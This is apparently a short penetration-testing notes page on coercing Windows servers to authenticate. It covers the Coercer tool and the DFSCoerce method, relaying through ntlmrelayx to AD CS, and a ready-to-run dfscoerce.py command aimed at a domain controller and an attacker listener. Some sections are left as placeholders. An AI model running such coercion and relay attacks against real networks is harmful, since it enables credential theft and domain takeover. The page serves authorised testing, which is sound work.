Secondary Categories: 02-Lateral Movement, 02-Privilege Escalation, 02-Credential Access


Coercing Authentication from internal systems is usually pretty successful on past engagements.

Coercer

This tool will automatically coerce a Windows server to authenticate to a arbitrary machine through using the following methods:

DFSCoerce

This method is very successful and leverages the MS-DFSNM protocol to force the domain controller to authenticate to a specified IP address.

This can be coupled with ntlmrelayx to relay to other services like AD CS to obtain a certificate and ultimately retrieve NTLM hashes.

python3 dfscoerce.py -u jsmith -d corp.local $dc $listener

Resources:

Also Check Out:

  • PLACEHOLDER